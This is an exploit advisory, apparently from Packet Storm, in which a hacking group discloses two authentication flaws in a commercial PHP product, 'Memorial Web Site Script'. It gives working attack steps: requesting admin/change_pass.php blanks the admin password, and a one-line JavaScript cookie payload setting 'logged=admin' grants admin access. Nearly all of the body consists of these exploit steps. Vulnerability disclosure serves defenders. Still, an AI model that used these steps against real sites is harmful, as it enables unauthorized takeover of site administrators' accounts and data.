Memorial Web Site Script suffers from password reset and insecure cookie handling vulnerabilities.
760ef13c884034f144f3aa8a797f01be878b0fd0add4599eadc774e096738faa
-----------------------------------------------------------------------
Memorial Web Site Script --> Reset Password & Insecure Cookie Handling
-----------------------------------------------------------------------
Author : Chip D3 Bi0s
Email : chipdebios[alt+64]gmail.com
Where : From Remote
Group : LatinHackTeam
Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~
Application : Memorial Web Site Script
Author : Easy Scripts
Price : $49
Vendor : https://www.easy-scripts.net
description Bug:
~~~~~~~~~~~~~~~
To reset the password just use this:
https://127.0.0.1/[path]/admin/change_pass.php
so the password will be null, login with single user can
admin:
https://127.0.0.1/[path]/admin/
--------------------------
Insecure Cookie Handling
exploit:
javascript:document.cookie="logged=admin;path=/";
https://127.0.0.1/[path]/admin/
--------------------------
+++++++++++++++++++++++++++++++++++++++
#[!] Produced in South America
+++++++++++++++++++++++++++++++++++++++
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed